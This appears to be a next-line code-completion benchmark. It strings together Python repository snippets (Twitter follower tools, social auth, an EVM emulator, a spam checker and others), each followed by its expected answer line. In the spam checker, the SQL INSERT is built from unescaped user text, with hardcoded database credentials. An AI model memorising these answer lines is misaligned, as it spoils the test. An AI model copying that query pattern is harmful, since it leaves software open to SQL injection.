def __init__(self, authorization_token, cookie_value, csrf_token):
def get_auth_headers(self, referer='https://twitter.com/'):
def get_multi_user_info(self) -> List[MyUser]:
def set_current_user_info(self, user: MyUser):
def get_current_user_info(self) -> MyUser:
def _get_user_list_by_graphql(self, url, referer, max, cursor):
def user_valid(user) -> bool:
def map_entry_to_user(user) -> FollowingUser:
def get_following_by_graphql(self, max=20, cursor="") -> Tuple[List[FollowingUser], str]:
def get_all_following_by_graphql(self, singe_max=50) -> List[FollowingUser]:
def get_followers_by_graphql(self, max=20, cursor=""):
def get_all_followers_by_graphql(self, singe_max=50) -> List[FollowingUser]:
def unfollow(self, following: FollowingUser):
# Path: common_cli.py
def select_account():
users = client.get_multi_user_info()
choice = 0
if len(users) > 1:
print("Select Account:")
for idx, user in enumerate(users):
print(f"{idx+1}. {user['screen_name']}")
choice = input("Which Account? Please input the number: ")
choice = int(choice) - 1
client.set_current_user_info(users[choice])
# Path: common_cli.py
def trials(subjects: List[FollowingUser]):
length = len(subjects)
for idx, subject in enumerate(subjects):
# clear screen
os.system('clear')
print(f"\n\t\t\t{f'Here is the {idx+1}/{length} subject:'}")
print(f"\n\n{center_text(LINE_STR)}\n\n")
trial_single(subject)
# Path: back_white_list.py
WHITELIST_PATH = 'cache/whitelist.json'
BLACKLIST_PATH = 'cache/blacklist.json'
def use_list(path: str):
def load_list() -> List[FollowingUser]:
def save_list(following: FollowingUser):
def filter_not_in_list(followings: List[FollowingUser]):
def is_in_whitelist(following: FollowingUser):
# Path: check_following.py
import json
from typing import List
from client import client, FollowingUser
from common_cli import select_account, trials
from back_white_list import filter_not_in_whitelist, filter_not_in_blacklist
FOLLOWING_CACHE_PATH = 'cache/followings.json'
def load_followings():
try:
with open(FOLLOWING_CACHE_PATH, 'r') as f:
return json.load(f)
except FileNotFoundError:
return False
def get_all_followings(force_update=False):
followings = load_followings()
if followings and not force_update:
return followings
followings = client.get_all_following_by_graphql(50)
print("saving followings...")
with open('cache/followings.json', 'w') as f:
json.dump(followings, f)
return followings
def filter_one_way_followings(followings: List[FollowingUser]):
one_way_followings = []
for following in followings:
if "followed_by" not in following or not following["followed_by"]:
one_way_followings.append(following)
return one_way_followings
def is_public_account(following: FollowingUser):
if following["verified"]:
return True
followers_count = following.get("followers_count", 0)
following_count = following.get("following_count", 0)
if following_count < 100 and followers_count > 2000:
return True
if following_count == 0:
return False
return followers_count / following_count > 30
def filter_not_public_accounts(followings: List[FollowingUser]):
return [following for following in followings if not is_public_account(following)]
def main_trails():
select_account()
followings = get_all_followings()
subjects = filter_one_way_followings(followings)
subjects = filter_not_public_accounts(subjects)
subjects = filter_not_in_whitelist(subjects)
subjects = filter_not_in_blacklist(subjects)
| trials(subjects) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Shritesh99/strawberry-django-social-auth
# Path: gql_social_auth/decorators.py
def social_auth(f):
"""
Decorator for Getting social User. Use this decorator if you want to customize the SocialAuthMixin.
:param f: Input: SocialAuthInput(provider, accessToken)
:return: function with two additional arguments
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@psa
@wraps(f)
def wrapper(cls, info, _input, social_user, errors, **kwargs):
def on_resolve(payload):
payload.social_user = social_user
payload.errors = errors
return payload
result = f(cls, info, _input, social_user, errors, **kwargs)
if is_thenable(result):
return Promise.resolve(result).then(on_resolve)
return on_resolve(result)
return wrapper
# Path: gql_social_auth/types.py
class SocialAuthInput:
provider: str
access_token: str
# Path: gql_social_auth/types.py
class SocialType(ObtainJSONWebTokenType):
uid: Optional[str] = strawberry.field(
description="User's uid", default=None)
avatar: Optional[str] = strawberry.field(
description="User's Avarar's URL", default=None)
provider: Optional[str] = strawberry.field(
description="OAUTH provider", default=None)
extra_data: Optional[SocialJSON] = strawberry.field(
description="Extra data requested from user",
resolver=resolve_extra_data)
@classmethod
def from_social_user(cls, social_user) -> "SocialType":
"""
Creates a new token and possibly a new refresh token based on the user.
"""
ret = SocialType(
success=True,
user=cast(UserType, social_user),
token=TokenType.from_user(social_user),
uid=social_user.social_user.uid,
provider=social_user.social_user.provider,
)
if hasattr(settings, 'SOCIAL_AUTH_PIPELINE') and 'gql_social_auth.pipeline.get_avatar' in settings.SOCIAL_AUTH_PIPELINE:
ret.avatar = social_user.avatar
if app_settings.JWT_LONG_RUNNING_REFRESH_TOKEN:
ret.refresh_token = cast(RefreshTokenType, RefreshToken.from_user(social_user))
return ret
# Path: gql_social_auth/mixins.py
from strawberry.types import Info
from gqlauth.user.resolvers import BaseMixin
from .decorators import social_auth
from .types import SocialAuthInput
from .types import SocialType
class SocialAuthMixin(BaseMixin):
"""Social Auth takes OAuth Provider and OAuth Access Token
Allow user to perform social auth for the given OAuth provider and OAuth Access token
:returns
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@classmethod
| @social_auth |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Scholar01/ComfyUI-Keyframe
# Path: keyframe/util.py
def is_injected_model(model):
return hasattr(model, KEYFRAME_INJECTED_ATTR)
# Path: keyframe/util.py
def get_injected_model(model):
return getattr(model, KEYFRAME_INJECTED_ATTR)
# Path: keyframe/util.py
def generate_sigmas(real_model, x, origin_sigmas, scheduler, steps, part_group, device):
batch_size = x.shape[0]
new_sigmas = origin_sigmas.unsqueeze(0).repeat(batch_size, 1)
for part in part_group:
if part.denoise is None or part.denoise > 0.9999:
new_sigmas[part.batch_index] = calculate_sigmas_scheduler(real_model, scheduler, steps).to(device)
else:
new_steps = int(steps / part.denoise)
sigmas = calculate_sigmas_scheduler(real_model, scheduler, new_steps).to(device)
new_sigmas[part.batch_index] = sigmas[-(steps + 1):]
return new_sigmas
# Path: keyframe/util.py
def generate_noise(model_wrap, sigmas, noise):
if max_denoise(model_wrap, sigmas):
n = noise * torch.sqrt(1.0 + sigmas[0] ** 2.0)
else:
n = noise * sigmas[0]
return n
# Path: keyframe/util.py
def get_ancestral_step(sigma_from: torch.Tensor, sigma_to: torch.Tensor, eta: float = 1.) -> (
torch.Tensor, torch.Tensor):
if not eta:
return sigma_to, torch.zeros_like(sigma_to)
sigma_up = torch.min(sigma_to,
eta * (sigma_to ** 2 * (sigma_from ** 2 - sigma_to ** 2) / sigma_from ** 2) ** 0.5)
sigma_down = (sigma_to ** 2 - sigma_up ** 2) ** 0.5
return sigma_down, sigma_up
# Path: keyframe/samples.py
import torch
import comfy.samplers
from tqdm.auto import trange
from comfy.k_diffusion import sampling as k_diffusion_sampling
from comfy.k_diffusion.sampling import to_d, default_noise_sampler
from .util import is_injected_model, get_injected_model, generate_sigmas, generate_noise, get_ancestral_step
CUSTOM_SAMPLERS = [
'k_euler', 'k_euler_a', 'k_lcm'
]
def inject_samples():
comfy.samplers.SAMPLER_NAMES.extend(CUSTOM_SAMPLERS)
k_diffusion_sampling.sample_k_euler = sample_k_euler
k_diffusion_sampling.sample_k_euler_a = sample_k_euler_a
k_diffusion_sampling.sample_k_lcm = sample_k_lcm
print(f'Injected samplers: {CUSTOM_SAMPLERS}')
def get_sigmas_noise(model_wrap, x, noise, latent_image, sigmas, scheduler, steps, part_group):
| sigmas = generate_sigmas(model_wrap.inner_model, x, sigmas, scheduler, steps, part_group, sigmas.device) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Hamidrezaostadabbas/FOSS4G_Asia_2023
# Path: 03_Exercise_2/exercise_2/layout_generator/layout_generator_dialog.py
class LayoutGeneratorDialog(QtWidgets.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(LayoutGeneratorDialog, self).__init__(parent)
# Set up the user interface from Designer through FORM_CLASS.
# After self.setupUi() you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def import_vector_layer(layer_path, layer_name):
layer = QgsVectorLayer(layer_path, layer_name)
return layer if layer.isValid() else None
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def display_vector_layer(layer, name=None):
displayed_layer = QgsProject.instance().addMapLayer(layer)
if name:
displayed_layer.setName(name)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def zoom_to_layer(layer):
canvas = iface.mapCanvas()
extent = layer.extent()
canvas.setExtent(extent)
canvas.refresh()
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def qml_loader(layer, layer_symbol_path):
layer.loadNamedStyle(layer_symbol_path)
layer.triggerRepaint()
iface.layerTreeView().refreshLayerSymbology(layer.id())
QgsProject.instance().addMapLayers([layer], False)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def get_script_path_plugin():
return os.path.dirname(__file__)
# Path: 03_Exercise_2/exercise_2/layout_generator/layout.py
def layout_executor(
layers_name, layout_title, city_name, pdf_path
):
legend_layers = []
for layer_name in layers_name:
layer = QgsProject.instance().mapLayersByName(layer_name)[0]
legend_layers.append(layer)
layout = __layout_creator(layout_title)
__layout_map_window_creator(layer, layout, 20, 7, 294, 285)
__layout_label_creator(layout, 23, 266, 82, 24, background_color=QColor(255, 255, 255))
__layout_label_creator(
layout, 320, 5, 96, 6, layout_title, QColor(0, 182, 228),
14, 'bold', 'Arial'
)
__layout_legend_creator(layout, legend_layers, 319, 12, 98, 186)
__layout_label_creator(
layout, 320, 220, 96, 20, 'City Name', QColor(0, 182, 228), 20,
'bold', 'Arial'
)
__layout_label_creator(layout, 320, 230, 96, 20, city_name, QColor(), 16)
__layout_pdf_exporter(layout, pdf_path)
# Path: 03_Exercise_2/exercise_2/layout_generator/layout_generator.py
from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction
from .resources import *
from .layout_generator_dialog import LayoutGeneratorDialog
from .core_functions import (
import_vector_layer, display_vector_layer, zoom_to_layer, qml_loader, get_script_path_plugin
)
from .layout import layout_executor
import os.path
# -*- coding: utf-8 -*-
"""
/***************************************************************************
LayoutGenerator
A QGIS plugin
auto layout generator
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2023-11-24
git sha : $Format:%H$
copyright : (C) 2023 by foss4g-asia
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
class LayoutGenerator:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# new variables
| self.layout_generator_dialog = LayoutGeneratorDialog() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: micheltlutz/Winged-Python
# Path: winged/HTML/string.py
class String(GenericElement):
text = ""
def __init__(self, str):
super().__init__()
self.text = str
def get_string(self):
return self.text
def generate(self):
print(self.get_string())
# Path: winged/core/generic_element.py
class GenericElement(ElementAbstract):
_elements: [ElementAbstract]
def __init__(self):
self._elements = []
# This method add a new element
def add(self, element: ElementAbstract):
self._elements.append(element)
# This method return tag and all elements
def get_string(self):
string = ""
for element in self._elements:
string += element.get_string()
return string
# This method print tag and all elements
def generate(self):
print(self.get_string())
# Path: winged/core/tag.py
class Tag(ElementAbstract):
_tag: str = ""
_attributes: Attribute
_container: bool = False
_form_element: bool = False
_elements: [ElementAbstract]
def __init__(self, *attributes: AttributeType):
self._attributes = Attribute()
self._elements = []
for att in attributes:
self._attributes.add_attribute(att)
# This method add a new n attributes
def add_attributes(self, *attributes: AttributeType):
for att in attributes:
self._attributes.add_attribute(att)
# This method add a new element
def add(self, element: ElementAbstract):
self._elements.append(element)
# This method return open tag and all attributes
def _get_open_tag(self):
attr = self._attributes.get_string()
if len(attr) > 0:
return f"<{self._tag} {attr}>"
else:
return f"<{self._tag}>"
# This method return close tag
def _get_close_tag(self):
return f"</{self._tag}>"
def get_tag(self):
return self._tag
def get_attributes(self):
return self._attributes
def is_container(self):
return self._container
def is_form_element(self):
return self._form_element
# This method return tag and all elements
def get_string(self):
string = self._get_open_tag()
if self._container:
for element in self._elements:
string += element.get_string()
string += self._get_close_tag()
return string
# This method print tag and all elements
def generate(self):
print(self.get_string())
# Path: winged/HTML/thead.py
class THead(Tag):
_tag = "thead" # Specifies the name of the tag
_container = True # Specifies that THead can contain other HTML elements
_form_element = False # Specifies that THead is not a form element
# Path: winged/HTML/tbody.py
class TBody(Tag):
_tag = "tbody" # Specifies the name of the tag
_container = True # Specifies that TBody can contain other HTML elements
_form_element = False # Specifies that TBody is not a form element
# Path: winged/HTML/tr.py
class Tr(Tag):
_tag = "tr" # Specifies the name of the tag
_container = True # Specifies that TR can contain other HTML elements
_form_element = False # Specifies that TR is not a form element
# Path: winged/HTML/th.py
class Th(Tag):
_tag = "th" # Specifies the name of the tag
_container = True # Specifies that TH can contain other HTML elements
_form_element = False # Specifies that TH is not a form element
# Path: winged/HTML/td.py
class Td(Tag):
_tag = "td" # Specifies the name of the tag
_container = True # Specifies that TD can encapsulate other HTML elements
_form_element = False # Specifies that TD is not a form element
# Path: winged/HTML/table.py
from winged.HTML.string import String
from winged.core.generic_element import GenericElement
from winged.core.tag import Tag
from winged.HTML.thead import THead
from winged.HTML.tbody import TBody
from winged.HTML.tr import Tr
from winged.HTML.th import Th
from winged.HTML.td import Td
"""
The Table class is a specific implementation of the HTML 'table' tag in the Winged-Python library.
It provides helper methods to generate table structures.
Table creation involves creating headers (th), rows (tr), and data cells (td).
# Example Usage:
```python
table = Table()
table.add_table_headers(["Name", "Age", "Height", "Location"]) # Define headers
table.add_row()
table.add_in_row(String("John"))
table.add_in_row(String("25"))
table.add_in_row(String("1.80"))
table.add_in_row(String("New York"))
```
This would generate a table with mentioned headers and one row of data.
"""
class Table(Tag):
_tag = "table"
_container = True
_form_element = False
def __init__(self):
super().__init__()
self.tbody = TBody()
self.thead = None
self.rows = []
def add_table_headers(self, titles, aligns=None, classes=None):
| self.thead = THead() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: davidhozic/TkClassWizard
# Path: tkclasswiz/extensions.py
@doc_category("Extensions")
def extendable(obj: Union[T, list]) -> T:
"""
Decorator that makes the obj extendable.
It wraps the ``obj``, which is a class or a function, into an extension object.
The extension object will adds 3 methods to the original class or function:
- ``register_pre_extension``
- ``register_post_extension``
- ``get_extensions``
The ``get_extensions`` method just returns the list of registered
extensions (:class:`tkclasswiz.extensions.Extension`).
The ``register_pre_extension`` and ``register_post_extension`` methods allow users to extend
the functionality of original tkclass wiz classes or functions.
They accept the extension (:class:`tkclasswiz.extensions.Extension`) parameter.
Pre-extensions (``register_pre_extension``) get activated / called before the original ``__init__`` method /
before the original function and accept the ``loader`` of the extension must accept the same arguments
as the original ``__init__`` method / original function.
Post-extensions differ a bit if the thing being extended is a class or a function.
They both have in common that they get activated after the original ``__init__`` method call / original function
call, but they differ in the arguments they receive:
- In the case of the extended is a class,
the extension ``loader`` accepts the same arguments as the ``__init__`` method receives.
- In the case of the extended is a function,
the extension ``loader`` accepts the same arguments as the original function and an additional parameter,
which is the result of the original function call. The result parameter is passed to the ``loader`` as the
last positional argument.
Parameters
---------------
obj: T
Function or a class that can be extended.
"""
if DOCUMENTATION_MODE:
return obj
if isclass(obj):
@wraps(obj, updated=[])
class ExtendableClass(obj):
__reg_post_ext__ = []
__reg_pre_ext__ = []
def __init__(self, *args, **kwargs):
for extension in ExtendableClass.__reg_pre_ext__:
extension(self, *args, **kwargs)
super().__init__(*args, **kwargs)
extension: Extension
for extension in ExtendableClass.__reg_post_ext__:
extension(self, *args, **kwargs)
@classmethod
def register_pre_extension(cls, extension: Extension):
cls.__reg_pre_ext__.append(extension)
@classmethod
def register_post_extension(obj, extension: Extension):
obj.__reg_post_ext__.append(extension)
@classmethod
def get_extensions(obj):
return obj.__reg_pre_ext__, obj.__reg_post_ext__[:]
return ExtendableClass
else:
class ExtendableFunction:
__reg_post_ext__ = []
__reg_pre_ext__ = []
def __init__(self, bind: object = None) -> None:
self.bind = bind
def __call__(self, *args, **kwargs):
if self.bind is not None:
extra_args = (self.bind,) # self reference
else:
extra_args = ()
for ext in ExtendableFunction.__reg_pre_ext__:
ext(*extra_args, *args, **kwargs)
r = obj(*extra_args, *args, **kwargs)
for ext in ExtendableFunction.__reg_post_ext__:
r = ext(*extra_args, *args, r, **kwargs)
return r
def __get__(self, instance, cls):
# Bind the wrapper callable object into a callable object "instance"
return ExtendableFunction(instance)
@classmethod
def register_pre_extension(cls, extension: Extension):
cls.__reg_pre_ext__.append(extension)
@classmethod
def register_post_extension(cls, extension: Extension):
cls.__reg_post_ext__.append(extension)
@classmethod
def get_extensions(obj):
return obj.__reg_pre_ext__, obj.__reg_post_ext__[:]
return ExtendableFunction()
# Path: tkclasswiz/doc.py
def doc_category(
cat: str,
manual: Optional[bool] = False,
path: Optional[str] = None,
api_type: Literal["Program", "HTTP"] = "Program"
):
"""
Used to mark the object for documentation.
Objects marked with this decorator function will
have :mod:`sphinx.ext.autodoc` directives generated automatically.
Parameters
------------
cat: str
The name of the category to put this in.
manual: Optional[bool]
Generate ``function`` directives instead of ``autofunction``.
Should be used when dealing with overloads.
path: Optional[str]
Custom path to the object.
api_type: Literal["Program", "HTTP"]
The type of API, the documented item belongs to.
Defaults to 'Program'
"""
def _category(item): # item == class or function
if DOCUMENTATION_MODE:
cat_map[api_type][cat].append((item, manual, path))
return item
if DOCUMENTATION_MODE:
if cat not in cat_map[api_type]:
cat_map[api_type][cat] = []
return _category
# Path: tkclasswiz/object_frame/frame_string.py
from typing import Any
from ..storage import *
from .frame_base import *
from ..extensions import extendable
from ..doc import doc_category
import tkinter as tk
TEXT_MAX_UNDO = 20
__all__ = (
"NewObjectFrameString",
)
| @extendable
|
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: har777/snek-evm
# Path: vm.py
class EVM:
def __init__(self):
self.address_to_contract = {}
def create_contract(self, bytecode, address):
contract = Contract(bytecode=bytecode, address=address)
self.address_to_contract[address] = contract
return contract
def execute_transaction(self, address, transaction_metadata, operation_metadata=None, debug=False):
if not operation_metadata:
operation_metadata = OperationMetadata()
operation = Operation(
evm=self,
address=address,
transaction_metadata=transaction_metadata,
operation_metadata=operation_metadata,
)
operation.execute(debug=debug)
return operation
def __str__(self):
return f"EVM(address_to_contract={self.address_to_contract})"
# Path: vm.py
class TransactionMetadata:
def __init__(self, from_address, value="0", data="0x"):
# calldata has to be even length if present
if len(data) % 2 != 0:
raise Exception("Invalid calldata length")
self.from_address = from_address.lower()
self.value = value
self.data = data.lower()
def __str__(self):
return f"TransactionMetadata(from={self.from_address} value={self.value}, data={self.data})"
# Path: vm.py
def get_create_contract_address(sender_address: str, sender_nonce: int):
sender = bytes.fromhex(sender_address[2:])
contract_address = "0x" + keccak.new(digest_bits=256, data=rlp.encode([sender, sender_nonce])).hexdigest()[-40:]
return contract_address
# Path: vm.py
def get_create2_contract_address(origin_address: str, salt: int, initialisation_code: str):
contract_address = "0x" + keccak.new(digest_bits=256, data=(
bytes.fromhex("ff") +
bytes.fromhex(origin_address[2:]) +
bytes.fromhex(hex(salt)[2:].rjust(64, "0")) +
bytes.fromhex(keccak.new(digest_bits=256, data=bytes.fromhex(initialisation_code)).hexdigest())
)).hexdigest()[-40:]
return contract_address
# Path: test.py
import unittest
from vm import EVM, TransactionMetadata, get_create_contract_address, get_create2_contract_address
class UtilTestCase(unittest.TestCase):
def test_get_create_contract_address(self):
sender_address = "0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0"
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=0),
"0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=1),
"0x343c43a37d37dff08ae8c4a11544c718abb4fcf8")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=2),
"0xf778b86fa74e846c4f0a1fbd1335fe81c00a0c91")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=3),
"0xfffd933a0bc612844eaf0c6fe3e5b8e9b6c1d19c")
def test_get_create2_contract_address(self):
# https://eips.ethereum.org/EIPS/eip-1014
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0x4d1a2e2bb4f88f0250f26ffff098b0b30b26bf38"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0xb928f69bb1d91cd65274e3c79d8986362984fda3"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=1455368932401306996839762510191304720241787928576,
initialisation_code="00"
),
"0xd04116cdd17bebe565eb2422f2497e06cc1c9833"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="deadbeef"
),
"0x70f2b2914a2a4b783faefb75f459a580616fcb5e"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeef"
),
"0x60f3f640a8508fc6a86d45df051962668e1e8ac7"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
),
"0x1d8bfdc5d46dc4f61d6b6115972536ebe6a8854c"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code=""
),
"0xe33c0c7f7df4809055c3eba6c09cfe4baf1bd9e0"
)
class OpcodeTestCase(unittest.TestCase):
def setUp(self):
| self.evm = EVM() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AvaterClasher/eli
# Path: eli/exceptions/auth.py
class CredentialsError(Exception): ...
# Path: eli/exceptions/connection.py
class NetworkError(Exception): ...
# Path: eli/constants/service.py
MINDSDB_HOST = 'https://cloud.mindsdb.com'
# Path: eli/middlewares/mindsdb.py
class MindsDB:
"""
MindsDB manager class
"""
def __init__(self, email: str, password: str) -> None:
"""
initializer class.
Args:
email: MindsDB account email address (that is stored as an env var)
password: MindsDB account password
"""
self.email = email
self.password = password
self.is_authenticated: bool = False
self.database: Database
def authenticate(self) -> None:
"""
authorizes the email and password with MindsDB's host
"""
try:
server = mindsdb_sdk.connect(
MINDSDB_HOST,
login=self.email,
password=self.password,
)
except HTTPError:
raise CredentialsError('Email or password is incorrect. Make sure to enter the right credentials.')
except ConnectionError:
raise NetworkError('Make sure you have access to the internet and try again.')
self.is_authenticated = True
self.database = self.collect_database(server)
@staticmethod
def collect_database(server: Server) -> Database:
return server.list_databases()[0]
def answer(self, question: str) -> Markdown:
"""
takes the question and queries then converts the response into `rich.Markdown`
Args:
question: the value from `ask` positional argument
Returns:
response from MindsDB in Markdown format
"""
return Markdown(to_data(
self.database.query(
SQL_ASK_QUERY.substitute(
ask=question,
user=getuser(),
)
).fetch()
))
# Path: tests/middlewares/test_mindsdb.py
import pytest
from pandas import DataFrame
from unittest.mock import patch, MagicMock
from eli.exceptions.auth import CredentialsError
from eli.exceptions.connection import NetworkError
from requests.exceptions import HTTPError, ConnectionError
from eli.constants.service import MINDSDB_HOST
from eli.middlewares.mindsdb import MindsDB
@patch('mindsdb_sdk.connect')
def test_authenticate(mock_connect):
email = '[email protected]'
password = 'testpassword'
mock_server = MagicMock()
mock_connect.return_value = mock_server
mindsdb = MindsDB(email, password)
mindsdb.authenticate()
mock_connect.assert_called_once_with(MINDSDB_HOST, login=email, password=password)
mock_server.list_databases.assert_called_once()
assert mindsdb.is_authenticated is True
def test_authenticate_incorrect_password():
mindsdb = MindsDB('[email protected]', 'testpassword')
with pytest.raises(CredentialsError):
with patch('mindsdb_sdk.connect', side_effect=HTTPError):
mindsdb.authenticate()
def test_authenticate_network_error():
mindsdb = MindsDB('[email protected]', 'testpassword')
| with pytest.raises(NetworkError): |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: xduck7/AI_Spam_checker
# Path: predict.py
def do_prediction(message):
#подгрузка модели
loaded_model = load_model('./Model/your_model.h5')
loaded_label_encoder = joblib.load('./Model/label_encoder.pkl')
loaded_vectorizer = joblib.load('./Model/vectorizer.pkl')
#получение сообщения
input_text = [message]
X_input = loaded_vectorizer.transform(input_text).toarray()
y_pred_prob = loaded_model.predict(X_input)
#print(y_pred_prob) #вывод шанса \ отладка
#преобразование шанса в 1, если он >0.515
threshold = 0.515
y_pred = (y_pred_prob > threshold).astype(int)
predicted_class = loaded_label_encoder.inverse_transform(y_pred)
#вывод результата
print(f'Предсказанный класс: {predicted_class[0]}') #отладка
return y_pred
# Path: rqst.py
def add_report(msg, pred):
id = gen_id()
author = names.get_first_name()
date_time = datetime.datetime.now()
conn = psycopg2.connect(dbname='postgres',
user='postgres',
password='postgres',
host='localhost',
port='5432')
cursor = conn.cursor()
cursor.execute("INSERT INTO forspam (id, date_time, author, content, class) values "+
f"('{id}','{date_time}','{author}','{msg}','{pred}')")
conn.commit()
cursor.close()
conn.close()
# Path: rqst.py
def first_start():
conn = psycopg2.connect(dbname='postgres',
user='postgres',
password='postgres',
host='localhost',
port='5432')
cursor = conn.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS forspam ("+
"ID VARCHAR, " +
"DATE_TIME VARCHAR, " +
"AUTHOR VARCHAR, " +
"CONTENT VARCHAR, " +
"CLASS VARCHAR )")
conn.commit()
cursor.close()
conn.close()
# Path: start.py
import tkinter as tk
from predict import do_prediction
from rqst import add_report
from rqst import first_start
root= tk.Tk()
root.title("SPAM CHECKER")
root.geometry("500x600")
root.resizable(width=True, height=True)
def get_input():
inputValue=textBox.get("1.0","end-1c")
print(inputValue)
textBox.delete('1.0', 'end')
return inputValue
def union():
msg = get_input()
result = do_prediction(msg)
if (result == 1):
final_opinion = "✅"
else:
final_opinion = "❌"
#final_opinion = ("Spam result is " + str(result))
label_result.configure(text=final_opinion)
label_result.pack()
add_report(str(msg), str(result[0][0]))
image = tk.PhotoImage(file='./Image/logo.png')
smaller_image = image.subsample(5, 5)
panel = tk.Label(root, image = smaller_image)
textBox= tk.Text(root,
height=3, width=80,
borderwidth=5,
font="Arial 18")
panel_text = tk.Label(text="Spam checker",
font="Arial 16")
panel_values = tk.Label(text="✅ = spam \n ❌ = NOT spam",
font="Arial 16")
buttonCommit= tk.Button(root,
height=1, width=10,
text="Check spam",font='Arial 20',
command=lambda: union(),
borderwidth=5)
label_result = tk.Label(text="Loading...", font="Arial 20")
filler = tk.Label(text=' ')
| first_start() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TheJacksonLaboratory/geneweaver-boolean-algebra
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_0 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
}
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_1 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_2 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
GeneValue(symbol="I", value=1),
}
# Path: tests/unit/const.py
DIFF_BOOLEAN_GENESET_GENES_0_1_2 = {
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
GeneValue(symbol="I", value=1),
}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_1 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_1_2 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_2 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_1_2 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
